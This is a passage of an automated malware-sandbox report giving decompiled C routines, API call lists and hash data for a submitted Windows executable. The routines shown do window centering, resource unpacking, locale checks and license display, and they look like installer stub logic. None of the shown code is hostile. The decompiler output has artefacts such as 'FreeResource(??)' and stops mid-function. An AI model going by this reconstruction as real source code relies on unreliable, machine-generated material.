                                                                                                                                                                                                                                      0x00402a6a
                                                                                                                                                                                                                                      0x00402a6a
                                                                                                                                                                                                                                      0x00402a76

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402A6A
                                                                                                                                                                                                                                        • Part of subcall function 00402770: CharUpperA.USER32(F5E26B31,00000000,00000000,00000000), ref: 004027A5
                                                                                                                                                                                                                                        • Part of subcall function 00402770: CharNextA.USER32(0000054D), ref: 004027B2
                                                                                                                                                                                                                                        • Part of subcall function 00402770: CharNextA.USER32(00000000), ref: 004027B9
                                                                                                                                                                                                                                        • Part of subcall function 00402770: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402826
                                                                                                                                                                                                                                        • Part of subcall function 00402770: RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 0040284F
                                                                                                                                                                                                                                        • Part of subcall function 00402770: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 0040286D
                                                                                                                                                                                                                                        • Part of subcall function 00402770: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 0040289D
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00403926,?,?,?,?,-00000005), ref: 00402953
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00403926,?,?,?,?,-00000005,?), ref: 00402964
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00403926,?,?,?,?,-00000005,?), ref: 00402A1C
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00403926,?,?), ref: 00402A7A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                      • String ID: &9@
                                                                                                                                                                                                                                      • API String ID: 3949799724-3151572842
                                                                                                                                                                                                                                      • Opcode ID: f08d627a9b39c075e39bb1cac3a9160aebd58cd81b4f308e1b1566619998b2b6
                                                                                                                                                                                                                                      • Instruction ID: ba3b3054d0938aee2c0b7932b5ece4506b9cae3a43e9b58e400492fb35b9986c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f08d627a9b39c075e39bb1cac3a9160aebd58cd81b4f308e1b1566619998b2b6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9512C31A00219DBCB21CF98D988AAEB7B5FF48704F14407AE911F3391DB749A41CFA9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                                                      			E004043AE(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				struct tagRECT _v24;
                                                                                                                                                                                                                                      				struct tagRECT _v40;
                                                                                                                                                                                                                                      				struct HWND__* _v44;
                                                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                                                      				int _v52;
                                                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                                                      				int _v60;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                                                      				void* _t53;
                                                                                                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                                                                                                      				int _t59;
                                                                                                                                                                                                                                      				struct HWND__* _t63;
                                                                                                                                                                                                                                      				struct HWND__* _t67;
                                                                                                                                                                                                                                      				struct HWND__* _t68;
                                                                                                                                                                                                                                      				struct HDC__* _t69;
                                                                                                                                                                                                                                      				int _t72;
                                                                                                                                                                                                                                      				signed int _t74;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t63 = __edx;
                                                                                                                                                                                                                                      				_t29 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                      				_t68 = __edx;
                                                                                                                                                                                                                                      				_v44 = __ecx;
                                                                                                                                                                                                                                      				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                      				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                      				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                      				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                      				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                      				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                      				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                      				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                      				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                      				_t56 = _v48;
                                                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                                                      				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                      				_t67 = 0;
                                                                                                                                                                                                                                      				if(_t72 >= 0) {
                                                                                                                                                                                                                                      					_t63 = _v52;
                                                                                                                                                                                                                                      					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                      						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					_t72 = _t67;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                                                      				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                      				if(_t59 >= 0) {
                                                                                                                                                                                                                                      					_t63 = _v60;
                                                                                                                                                                                                                                      					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                      						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					_t59 = _t67;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return E00406C80(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                      			}
























                                                                                                                                                                                                                                      0x004043ae
                                                                                                                                                                                                                                      0x004043b6
                                                                                                                                                                                                                                      0x004043bd
                                                                                                                                                                                                                                      0x004043c4
                                                                                                                                                                                                                                      0x004043ca
                                                                                                                                                                                                                                      0x004043cf
                                                                                                                                                                                                                                      0x004043de
                                                                                                                                                                                                                                      0x004043e1
                                                                                                                                                                                                                                      0x004043e9
                                                                                                                                                                                                                                      0x004043fe
                                                                                                                                                                                                                                      0x00404407
                                                                                                                                                                                                                                      0x00404415
                                                                                                                                                                                                                                      0x00404422
                                                                                                                                                                                                                                      0x00404425
                                                                                                                                                                                                                                      0x0040442b
                                                                                                                                                                                                                                      0x00404432
                                                                                                                                                                                                                                      0x00404439
                                                                                                                                                                                                                                      0x0040443e
                                                                                                                                                                                                                                      0x0040443f
                                                                                                                                                                                                                                      0x00404445
                                                                                                                                                                                                                                      0x0040444d
                                                                                                                                                                                                                                      0x00404451
                                                                                                                                                                                                                                      0x00404451
                                                                                                                                                                                                                                      0x00404441
                                                                                                                                                                                                                                      0x00404441
                                                                                                                                                                                                                                      0x00404441
                                                                                                                                                                                                                                      0x00404458
                                                                                                                                                                                                                                      0x0040445f
                                                                                                                                                                                                                                      0x00404462
                                                                                                                                                                                                                                      0x00404468
                                                                                                                                                                                                                                      0x00404470
                                                                                                                                                                                                                                      0x00404474
                                                                                                                                                                                                                                      0x00404474
                                                                                                                                                                                                                                      0x00404464
                                                                                                                                                                                                                                      0x00404464
                                                                                                                                                                                                                                      0x00404464
                                                                                                                                                                                                                                      0x00404494

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004043CF
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004043E9
                                                                                                                                                                                                                                      • GetDC.USER32(?), ref: 00404401
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040440C
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404418
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00404425
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00404480
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2212493051-0
                                                                                                                                                                                                                                      • Opcode ID: c538e1003d443e2abb4db7385365572c3d9271ce0f5348b23ad7313ee7f553b4
                                                                                                                                                                                                                                      • Instruction ID: 04842699d65d601a917a66e442462ccc6f6cf29de10b5f251f50c040b857b905
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c538e1003d443e2abb4db7385365572c3d9271ce0f5348b23ad7313ee7f553b4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70314D71E00219AFCB14CFB8DE889EEBBB5EB89310F154139E905F7280D674AC058B65
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 53%
                                                                                                                                                                                                                                      			E00406246(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                                                      				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t16;
                                                                                                                                                                                                                                      				struct HRSRC__* _t21;
                                                                                                                                                                                                                                      				intOrPtr _t26;
                                                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                      				intOrPtr* _t40;
                                                                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                                                      				intOrPtr* _t45;
                                                                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                                                      				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t44 = __edx;
                                                                                                                                                                                                                                      				_t16 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                      				_t46 = 0;
                                                                                                                                                                                                                                      				_v32 = __ecx;
                                                                                                                                                                                                                                      				_v36 = 0;
                                                                                                                                                                                                                                      				_t36 = 1;
                                                                                                                                                                                                                                      				E0040173E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                                                      					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                      					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                                                                                                                      						break;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                      					if(_t45 == 0) {
                                                                                                                                                                                                                                      						 *0x409124 = 0x80070714;
                                                                                                                                                                                                                                      						_t36 = _t46;
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                      						_t44 = _t5;
                                                                                                                                                                                                                                      						_t40 = _t44;
                                                                                                                                                                                                                                      						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                      						_t47 = _t6;
                                                                                                                                                                                                                                      						do {
                                                                                                                                                                                                                                      							_t26 =  *_t40;
                                                                                                                                                                                                                                      							_t40 = _t40 + 1;
                                                                                                                                                                                                                                      						} while (_t26 != 0);
                                                                                                                                                                                                                                      						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                      						_t46 = _t51;
                                                                                                                                                                                                                                      						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                      						 *0x40a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                      						_t30 = _v32();
                                                                                                                                                                                                                                      						if(_t51 != _t51) {
                                                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_push(_t45);
                                                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                                                      							_t36 = 0;
                                                                                                                                                                                                                                      							FreeResource(??);
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							FreeResource();
                                                                                                                                                                                                                                      							_v36 = _v36 + 1;
                                                                                                                                                                                                                                      							E0040173E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                      							_t46 = 0;
                                                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                                                      					return E00406C80(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				goto L12;
                                                                                                                                                                                                                                      			}






















                                                                                                                                                                                                                                      0x00406246
                                                                                                                                                                                                                                      0x0040624e
                                                                                                                                                                                                                                      0x00406255
                                                                                                                                                                                                                                      0x0040625b
                                                                                                                                                                                                                                      0x0040625d
                                                                                                                                                                                                                                      0x00406269
                                                                                                                                                                                                                                      0x00406271
                                                                                                                                                                                                                                      0x00406272
                                                                                                                                                                                                                                      0x004062e9
                                                                                                                                                                                                                                      0x004062e9
                                                                                                                                                                                                                                      0x004062f3
                                                                                                                                                                                                                                      0x004062fb
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00406288
                                                                                                                                                                                                                                      0x0040628c
                                                                                                                                                                                                                                      0x0040630d
                                                                                                                                                                                                                                      0x00406317
                                                                                                                                                                                                                                      0x0040628e
                                                                                                                                                                                                                                      0x0040628e
                                                                                                                                                                                                                                      0x0040628e
                                                                                                                                                                                                                                      0x00406291
                                                                                                                                                                                                                                      0x00406293
                                                                                                                                                                                                                                      0x00406293
                                                                                                                                                                                                                                      0x00406296
                                                                                                                                                                                                                                      0x00406296
                                                                                                                                                                                                                                      0x00406298
                                                                                                                                                                                                                                      0x00406299
                                                                                                                                                                                                                                      0x0040629d
                                                                                                                                                                                                                                      0x0040629f
                                                                                                                                                                                                                                      0x004062a1
                                                                                                                                                                                                                                      0x004062b0
                                                                                                                                                                                                                                      0x004062b6
                                                                                                                                                                                                                                      0x004062bb
                                                                                                                                                                                                                                      0x004062c2
                                                                                                                                                                                                                                      0x004062c2
                                                                                                                                                                                                                                      0x004062c4
                                                                                                                                                                                                                                      0x004062c7
                                                                                                                                                                                                                                      0x00406303
                                                                                                                                                                                                                                      0x00406305
                                                                                                                                                                                                                                      0x004062c9
                                                                                                                                                                                                                                      0x004062c9
                                                                                                                                                                                                                                      0x004062df
                                                                                                                                                                                                                                      0x004062e2
                                                                                                                                                                                                                                      0x004062e7
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004062e7
                                                                                                                                                                                                                                      0x004062c7
                                                                                                                                                                                                                                      0x00406319
                                                                                                                                                                                                                                      0x00406329
                                                                                                                                                                                                                                      0x00406329
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040173E: _vsnprintf.MSVCRT ref: 00401770
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,0040518A,00000004,00000024,00402F64,?,00000002,00000000), ref: 0040627B
                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,0040518A,00000004,00000024,00402F64,?,00000002,00000000), ref: 00406282
                                                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,0040518A,00000004,00000024,00402F64,?,00000002,00000000), ref: 004062C9
                                                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 004062F3
                                                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,0040518A,00000004,00000024,00402F64,?,00000002,00000000), ref: 00406305
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                      • String ID: UPDFILE%lu
                                                                                                                                                                                                                                      • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                      • Opcode ID: 677cba6e35f3d904514a8cb8291db3971b0d229373c8a4fc7f4cf1ada09ee48f
                                                                                                                                                                                                                                      • Instruction ID: 1a5287a1557f3bf07b561b8ca416366afc74fc5edddbd1c2d4541084b1e87eac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 677cba6e35f3d904514a8cb8291db3971b0d229373c8a4fc7f4cf1ada09ee48f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19213735A00219AFEB00AF65DC459BF7B78EF44304B01413EE902F3290CB798C168BE9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                                                      			E004067CB(void* __ebx) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                                                      				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                      				void* _v172;
                                                                                                                                                                                                                                      				int* _v176;
                                                                                                                                                                                                                                      				int _v180;
                                                                                                                                                                                                                                      				int _v184;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                                                      				long _t31;
                                                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                                                      				void* _t36;
                                                                                                                                                                                                                                      				intOrPtr _t41;
                                                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t36 = __ebx;
                                                                                                                                                                                                                                      				_t19 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                      				_t41 =  *0x4081d8; // 0xfffffffe
                                                                                                                                                                                                                                      				_t43 = 0;
                                                                                                                                                                                                                                      				_v180 = 0xc;
                                                                                                                                                                                                                                      				_v176 = 0;
                                                                                                                                                                                                                                      				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                      					 *0x4081d8 = 0;
                                                                                                                                                                                                                                      					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                      					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                                                      						_t41 =  *0x4081d8; // 0xfffffffe
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						_t41 = 1;
                                                                                                                                                                                                                                      						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							_t31 = RegQueryValueExA(_v172, 0x401140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                      							_t43 = _t31;
                                                                                                                                                                                                                                      							RegCloseKey(_v172);
                                                                                                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                                                                                                      								goto L12;
                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                      								_t40 =  &_v176;
                                                                                                                                                                                                                                      								if(E004066A1( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                      									goto L12;
                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                      									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                      									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                      										 *0x4081d8 = _t41;
                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                      										goto L12;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return E00406C80(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                      			}


















                                                                                                                                                                                                                                      0x004067cb
                                                                                                                                                                                                                                      0x004067d6
                                                                                                                                                                                                                                      0x004067dd
                                                                                                                                                                                                                                      0x004067e2
                                                                                                                                                                                                                                      0x004067e8
                                                                                                                                                                                                                                      0x004067ea
                                                                                                                                                                                                                                      0x004067f4
                                                                                                                                                                                                                                      0x004067fd
                                                                                                                                                                                                                                      0x00406809
                                                                                                                                                                                                                                      0x00406810
                                                                                                                                                                                                                                      0x00406822
                                                                                                                                                                                                                                      0x004068e6
                                                                                                                                                                                                                                      0x004068e6
                                                                                                                                                                                                                                      0x00406828
                                                                                                                                                                                                                                      0x0040682a
                                                                                                                                                                                                                                      0x00406831
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00406882
                                                                                                                                                                                                                                      0x004068a0
                                                                                                                                                                                                                                      0x004068ac
                                                                                                                                                                                                                                      0x004068ae
                                                                                                                                                                                                                                      0x004068b6
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004068b8
                                                                                                                                                                                                                                      0x004068b8
                                                                                                                                                                                                                                      0x004068c8
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004068ca
                                                                                                                                                                                                                                      0x004068d0
                                                                                                                                                                                                                                      0x004068d7
                                                                                                                                                                                                                                      0x004068de
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004068d7
                                                                                                                                                                                                                                      0x004068c8
                                                                                                                                                                                                                                      0x004068b6
                                                                                                                                                                                                                                      0x00406831
                                                                                                                                                                                                                                      0x00406822
                                                                                                                                                                                                                                      0x004068fb

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0040681A
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000004A), ref: 00406853
                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00406878
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,?,0000000C), ref: 004068A0
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004068AE
                                                                                                                                                                                                                                        • Part of subcall function 004066A1: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,004068C6), ref: 004066E9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Control Panel\Desktop\ResourceLocale, xrefs: 0040686E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                      • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                      • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                      • Opcode ID: b02142e7477395605460f6304a864f245dda2cffd2f69521e08ac245a5a2a673
                                                                                                                                                                                                                                      • Instruction ID: 811173f791f646eea4f1b2da747f30634b7fa4e6eca4c961da7ff698f8e679bf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b02142e7477395605460f6304a864f245dda2cffd2f69521e08ac245a5a2a673
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F131A232A013289FDB209F11CE04BAB77B8EF55754F0140B6E50AB6280EB34D995CF5A
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                      			E00403A2B(void* __eflags) {
                                                                                                                                                                                                                                      				void* _t3;
                                                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                                                      				CHAR* _t16;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t16 = "LICENSE";
                                                                                                                                                                                                                                      				_t1 = E00404669(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                      				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                      				 *0x408d4c = _t3;
                                                                                                                                                                                                                                      				if(_t3 != 0) {
                                                                                                                                                                                                                                      					_t19 = _t16;
                                                                                                                                                                                                                                      					if(E00404669(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                      						if(lstrcmpA( *0x408d4c, "<None>") == 0) {
                                                                                                                                                                                                                                      							LocalFree( *0x408d4c);
                                                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                                                      							 *0x409124 = 0;
                                                                                                                                                                                                                                      							return 1;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t9 = E004064C3(_t19, 0x7d1, 0, E004030F0, 0, 0);
                                                                                                                                                                                                                                      						LocalFree( *0x408d4c);
                                                                                                                                                                                                                                      						if(_t9 != 0) {
                                                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                                                      						}
